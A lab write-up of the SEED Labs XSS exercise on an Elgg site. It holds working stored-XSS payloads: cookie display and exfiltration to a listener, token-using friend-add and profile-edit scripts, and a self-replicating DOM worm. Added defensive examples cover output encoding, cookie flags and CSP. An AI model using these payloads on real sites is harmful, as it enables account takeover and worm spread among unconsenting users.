Seedlabs web security XSS experiment

Posted by j0se on Wed, 26 Jan 2022 23:08:36 +0100


preface

Experimental records of XSS

Tip: the following is the main content of this article; the cases below can be used for reference.

Lab Tasks

1.1 familiar with "HTTP Header Live" tool

In this lab, we need to construct HTTP requests, so we first have to find out which HTTP requests Elgg accepts. That means we need to be able to capture and analyze HTTP requests. We can use the "HTTP Header Live" tool for this purpose. Before you begin this lab, you should familiarize yourself with this tool; the guide section gives instructions on how to use it.

1.2 publish malicious messages to display the alert window

The goal of this task is to embed a JavaScript program in the Elgg profile so that when another user views your profile, the JavaScript program is executed and an alert window is displayed. The following JavaScript program will display the alert window:

<script>alert('XSS');</script>

If you embed the above JavaScript code into your profile (for example, in the brief description field), anyone who views your profile will see the alert window. In this case, the JavaScript code is short enough to fit in the brief description field. If you want to run a longer JavaScript program but are limited by the number of characters the form accepts, you can store the JavaScript program in a separate file with the .js extension and reference it with the src attribute of the <script> tag. See the following example:

<script type="text/javascript"
src="http://www.example.com/myscripts.js">
</script>
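Both payloads above only work because the profile field is inserted into the page as raw HTML. The following is an added example (not code from the SEED lab or from Elgg) that models the defence a template needs: HTML-encoding the field on output so the browser treats it as text. The wrapper markup and the two sample payloads are constructed for the demonstration.

```javascript
// Added example (not part of the SEED lab or Elgg): output encoding for
// untrusted profile fields. This models what a template must do before
// inserting user-controlled text into HTML; Elgg's own code is not shown.

// Map each HTML-significant character to its entity.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode a string so the browser treats it purely as text, never as markup.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render a profile field into a page fragment, either the unsafe way the lab
// exploits (raw concatenation) or the safe way (encoded on output).
function renderBriefDescription(text, { escape }) {
  const body = escape ? escapeHtml(text) : text;
  return `<div class="briefdescription">${body}</div>`; // constructed wrapper
}

// Would the HTML parser see a script element in this fragment?
function containsScriptElement(fragment) {
  return /<script\b/i.test(fragment);
}

// Constructed sample inputs: the two payloads quoted in the lab text.
const INLINE_PAYLOAD = "<script>alert('XSS');</script>";
const REMOTE_PAYLOAD =
  '<script type="text/javascript" src="http://www.example.com/myscripts.js"></script>';

// Compare both rendering modes for both payloads.
function demo() {
  const results = {};
  const payloads = { inline: INLINE_PAYLOAD, remote: REMOTE_PAYLOAD };
  for (const [name, payload] of Object.entries(payloads)) {
    results[name] = {
      unsafeHasScript: containsScriptElement(renderBriefDescription(payload, { escape: false })),
      safeHasScript: containsScriptElement(renderBriefDescription(payload, { escape: true })),
    };
  }
  return results;
}

console.log(JSON.stringify(demo(), null, 2));
```

Encoding on output is the general fix: it neutralises both the inline payload and the remote-src variant, and it does not depend on guessing which tags an attacker will use. Input filtering that strips `<script>` is weaker, since the same field can carry event-handler attributes or other tags.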

solution
Enter the Docker container and insert the script code:

docker ps
docker exec -it <container-id> /bin/bash

Insert the previous <script>alert('XSS')</script>

echo "<script>alert('xss')</script>" >> index.html

It is worth noting here that the hosts are configured as described in the pdf

One item is missing and needs to be added:

10.9.0.5 www.seed-server.com

Then we log in to the site normally, for example as samy.
Next, insert the XSS code in the profile and save it.

Then go back to your home page

1.3 publishing malicious messages to display cookies

Go back to the edit page and replace the string inside alert() with document.cookie.

1.4 stealing cookies from the victim's machine

nc listens on port 5555 on the attacker's machine, and the XSS payload sends the cookies to that IP: 10.9.0.1

After listening is enabled here, we launch XSS attack

Get data
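What the listener receives depends on how the session cookie was set: a cookie flagged HttpOnly is never exposed through document.cookie, so the payload in tasks 1.3 and 1.4 would see nothing. The following is an added example (not code from the lab or from Elgg) that parses Set-Cookie headers and reports which of those protections are missing. The three sample headers are constructed, not captured from the lab server.

```javascript
// Added example (not from the SEED lab or Elgg): audit Set-Cookie headers for
// the attributes that limit what an injected script can do with a session
// cookie. HttpOnly keeps the cookie out of document.cookie; Secure and
// SameSite address transport and cross-site request channels.

// Parse one Set-Cookie header value into its name and attribute flags.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const cookie = { name, httpOnly: false, secure: false, sameSite: null };
  for (const attr of attrs) {
    const [key, value] = attr.split("=").map((s) => s.trim());
    switch (key.toLowerCase()) {
      case "httponly": cookie.httpOnly = true; break;
      case "secure": cookie.secure = true; break;
      case "samesite": cookie.sameSite = (value || "").toLowerCase(); break;
      default: break; // Path, Domain, Expires, Max-Age are not audited here
    }
  }
  return cookie;
}

// Return the protections a session cookie should carry but does not.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const missing = [];
  if (!c.httpOnly) missing.push("HttpOnly");
  if (!c.secure) missing.push("Secure");
  if (c.sameSite !== "lax" && c.sameSite !== "strict") missing.push("SameSite=Lax|Strict");
  return { name: c.name, missing };
}

// Audit a list of headers, e.g. everything a login response sent.
function auditAll(headers) {
  return headers.map(auditSessionCookie);
}

// Constructed sample headers (not captured from the lab server); the cookie
// name and value are placeholders.
const SAMPLE_HEADERS = [
  "Elgg=abc123; Path=/",                                 // readable by injected script
  "Elgg=abc123; Path=/; HttpOnly",                       // hidden from document.cookie
  "Elgg=abc123; Path=/; HttpOnly; Secure; SameSite=Lax", // hardened
];

console.log(auditAll(SAMPLE_HEADERS));
```

HttpOnly blunts the cookie theft in this task but does not stop the later tasks: a script running in the victim's page can still send requests that carry the cookie automatically, which is exactly what the friend-add and profile-edit payloads do.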

1.5 become a friend of the victim

The Elgg site is the same one used in the CSRF lab. How to find the add-friend interface and your own ID was already covered in the CSRF experiment and is not repeated here.
Once the interface is known, insert JavaScript code into the About me field in the profile editor. Everyone who visits your profile will then run code that calls the add-friend interface with samy as the friend:

<script type="text/javascript">
window.onload = function () {
    var Ajax=null;
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;
    //Construct the HTTP request to add Samy as a friend.
    var sendurl="http://www.seed-server.com/action/friends/add?friend=59"+ts+token;
    //Create and send Ajax request to add friend
    Ajax=new XMLHttpRequest();
    Ajax.open("GET", sendurl, true);
    Ajax.send();
}
</script>

After saving, every visitor triggers this code. Now log in as Alice.

Samy is not in Alice's friend list yet; next, visit samy's page from the Newest column.


Alice does nothing else and goes back to the friends page.

You can see that XSS has been executed and friends have been added successfully

1.5.1 explain the purpose of ts and token lines and why they are needed?

The site has a CSRF defence mechanism: each page the user loads carries a token and timestamp issued by the server, and the action is rejected without them. Directly constructing the add-friend URL is therefore not enough, because an attacker does not know the victim's token, so merely requesting http://www.seed-server.com/action/friends/add?friend=59 fails. The injected script runs inside the victim's page, so it can read both values from elgg.security.token and append them. See the CSRF experiment for details.

1.5.2 if Elgg application only provides editing mode for "about me" field and cannot switch to text mode, can you still launch a successful attack?

Yes. There are many other injection points, such as the Brief description, Location and Interests fields, into which script code can be injected.

1.6 modify the victim's profile

First, log in with your own account (samy) and capture the request sent when profile data is modified.


From the capture above, the interface address is: http://www.seed-server.com/action/profile/edit
The data is submitted with a POST request.
Build the script:

<script type="text/javascript">
window.onload = function(){
    //JavaScript code to access user name, user guid, timestamp __elgg_ts
    //and security token __elgg_token
    var userName=elgg.session.user.name;
    var guid=elgg.session.user.guid;
    var ts=elgg.security.token.__elgg_ts;
    var token=elgg.security.token.__elgg_token;
    var updateMessage = "hahaha";
    //Construct the form body; every field the edit form sends must be present
    var content="__elgg_token="+token+"&__elgg_ts="+ts+"&name="+userName+"&description=&accesslevel[description]=2&briefdescription="+updateMessage+"&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2&guid="+guid;
    var sendurl="http://www.seed-server.com/action/profile/edit";
    var samyGuid = 59;
    //Do not modify Samy's own profile (see 1.6.1)
    if(guid!=samyGuid){
        //Create and send Ajax request to modify profile
        var Ajax=null;
        Ajax=new XMLHttpRequest();
        Ajax.open("POST", sendurl, true);
        Ajax.setRequestHeader("Content-Type",
        "application/x-www-form-urlencoded");
        Ajax.send(content);
    }
}
</script>

It should be noted that the token and other data are put in the Post this time.

Then login to Alice's account

Then visit samy

Then Alice refreshes the personal center

profile modified successfully

1.6.1 why is there an if judgment in the above JavaScript attack code

  • The JavaScript code is inserted into samy's About me field. Once it is saved, the code also runs when samy visits his own home page. The request it builds leaves the description (About me) field empty while filling in the other fields, so as soon as samy visits his own page the injected script would be overwritten with an empty field, and later visitors to samy's page would no longer trigger the attack.
  • The if judgment compares the guid of the current user with samy's guid; if they are the same, the attack is not executed.

1.7 writing an autobiographical XSS worm

As noted in 1.6.1, the request constructed in 1.6 contains no script code in the About me field. A self-propagating worm must therefore put the same code back into About me whenever it modifies a profile: the code then always survives, and every visitor ends up with the attack code in their own About me field.

1.7.1 link worm

1. Capturing the request shows that the form field name for About me is description; this is used in 1.7.2.

2. Load the JS code (xsscode.js) remotely:

<script src="http://xxx.xxx.xxx.xxx/xsscode.js"></script>

This variant is skipped for now, because the focus is on the DOM worm, which is harder. If you understand the DOM type, the Link type follows naturally, and the lab requires the DOM type to be completed anyway.
In fact, the Link worm simply places the DOM worm code on a third-party server (which can be a self-built site) and loads it through the script src attribute, which saves a lot of work.

1.7.2 DOM worm

The DOM worm builds the JS itself: it copies its own source and submits the copy in the description field.

No external JS file is needed. Give the script element an id (handleMessage); the script reads its own code from that node's innerHTML, wraps it in an opening and a closing script tag, and assigns the result to description. Like a function that calls itself recursively, the code never has to be written out a second time; each copy simply reproduces itself.

<script id="handleMessage">
var headerTag = "<script id=\"handleMessage\" type=\"text/javascript\">";
var jsCode = document.getElementById("handleMessage").innerHTML;
//The closing tag is split so the HTML parser does not end this script element here
var tailTag = "</" + "script>";
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

window.onload = function(){
    var userName=elgg.session.user.name;
    var guid=elgg.session.user.guid;
    var ts=elgg.security.token.__elgg_ts;
    var token=elgg.security.token.__elgg_token;
    var updateMessage = "hahaha";
    //Same form body as in 1.6, but description now carries the worm code
    var content="__elgg_token="+token+"&__elgg_ts="+ts+"&name="+userName+"&description="+wormCode+"&accesslevel[description]=2&briefdescription="+updateMessage+"&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2&guid="+guid;
    var sendurl="http://www.seed-server.com/action/profile/edit";
    var samyGuid = 59;
    if(guid!=samyGuid){
        //Modify the visitor's profile
        var Ajax=null;
        Ajax=new XMLHttpRequest();
        Ajax.open("POST", sendurl, true);
        Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
        Ajax.send(content);

        //Add Samy as a friend
        Ajax=null;
        sendurl="http://www.seed-server.com/action/friends/add?friend=59"+"&__elgg_token="+token+"&__elgg_ts="+ts;
        Ajax=new XMLHttpRequest();
        Ajax.open("GET", sendurl, true);
        Ajax.send();
    }
}
</script>
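Both worm variants from 1.7.1 and 1.7.2 depend on the browser executing script that arrived in a profile field: the DOM worm is an inline script element, the link worm is a script loaded from another host. A Content-Security-Policy header decides exactly that. The following is an added example (not code from the lab or from Elgg) that models the script-src part of CSP in simplified form and evaluates the two variants against several policies. The page origin, the script URLs, the nonce value and the policies are constructed for the demonstration; port matching, path matching and hash sources are not modelled.

```javascript
// Added example (not from the SEED lab or Elgg): a simplified evaluator for
// the script-src directive of a Content-Security-Policy header. It shows why
// a policy without 'unsafe-inline' stops the DOM worm (an inline <script>)
// and a policy limited to 'self' stops the link worm (<script src> on
// another host). Only the source forms used below are modelled.

// Split a CSP header into a map of directive name -> list of source tokens.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

// script-src governs scripts, default-src is the fallback, and no directive
// at all means the policy does not restrict scripts.
function scriptSources(directives) {
  return directives["script-src"] || directives["default-src"] || null;
}

// Does a single source token allow this external script URL?
function hostSourceMatches(token, scriptUrl, pageOrigin) {
  const url = new URL(scriptUrl);
  if (token === "'self'") return url.origin === pageOrigin;
  if (token.startsWith("'")) return false; // other keywords never match a host
  if (token === "*") return true;
  // Host source: optional scheme, host with optional leading "*." wildcard.
  const host = token.replace(/^[a-z]+:\/\//i, "").replace(/\/.*$/, "");
  if (host.startsWith("*.")) return url.hostname.endsWith(host.slice(1));
  return url.hostname === host;
}

// script is { inline: true, nonce?: string } or { inline: false, src: string }.
function scriptAllowed(cspHeader, script, pageOrigin) {
  const sources = scriptSources(parseCsp(cspHeader));
  if (sources === null) return true;
  const hasNonceOrHash = sources.some((s) => /^'(nonce|sha(256|384|512))-/.test(s));
  if (script.inline) {
    // A matching nonce always allows; 'unsafe-inline' allows only when no
    // nonce or hash source is present, because those switch it off.
    if (script.nonce && sources.includes(`'nonce-${script.nonce}'`)) return true;
    return sources.includes("'unsafe-inline'") && !hasNonceOrHash;
  }
  return sources.some((t) => hostSourceMatches(t, script.src, pageOrigin));
}

// Constructed scenarios modelled on the two worm variants in the text.
const PAGE_ORIGIN = "http://www.seed-server.com";
const DOM_WORM = { inline: true };                                             // <script id="handleMessage">...
const LINK_WORM = { inline: false, src: "http://xxx.xxx.xxx.xxx/xsscode.js" }; // remote load
const SITE_JS = { inline: false, src: "http://www.seed-server.com/vendors/elgg.js" }; // assumed site script
const NONCED_SITE_SCRIPT = { inline: true, nonce: "r4nd0m" };                  // inline script the site emits itself

function evaluate(cspHeader) {
  return {
    domWorm: scriptAllowed(cspHeader, DOM_WORM, PAGE_ORIGIN),
    linkWorm: scriptAllowed(cspHeader, LINK_WORM, PAGE_ORIGIN),
    siteJs: scriptAllowed(cspHeader, SITE_JS, PAGE_ORIGIN),
    noncedSiteScript: scriptAllowed(cspHeader, NONCED_SITE_SCRIPT, PAGE_ORIGIN),
  };
}

const POLICIES = {
  none: "",
  permissive: "script-src 'self' 'unsafe-inline' *",
  selfOnly: "default-src 'self'",
  nonced: "script-src 'self' 'nonce-r4nd0m'",
};

for (const [name, policy] of Object.entries(POLICIES)) {
  console.log(name, evaluate(policy));
}
```

The nonced policy is the one worth noting: the site's own inline scripts keep working because the server stamps them with a per-response nonce, while a script that arrived through a stored profile field has no way to carry the right nonce. CSP is a second layer on top of output encoding, not a replacement for it.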


Save the profile.
Next, log in with Alice's account and visit Samy's home page.

View your home page and profile details


The code has been inserted into Alice's About me without her noticing.

Samy was also added as Alice's friend.
Now verify that the worm has spread to Alice and that anyone who visits Alice is infected in turn: their profiles are modified and the XSS worm code is placed in their About me, so the worm keeps spreading.

Login with Charlie account

Visit Alice again


Go back to Charlie's Profile and see that it has been modified successfully

See if your friends have been added

The DOM worm is complete. It copies and spreads itself, and the number of users who add Samy as a friend grows exponentially.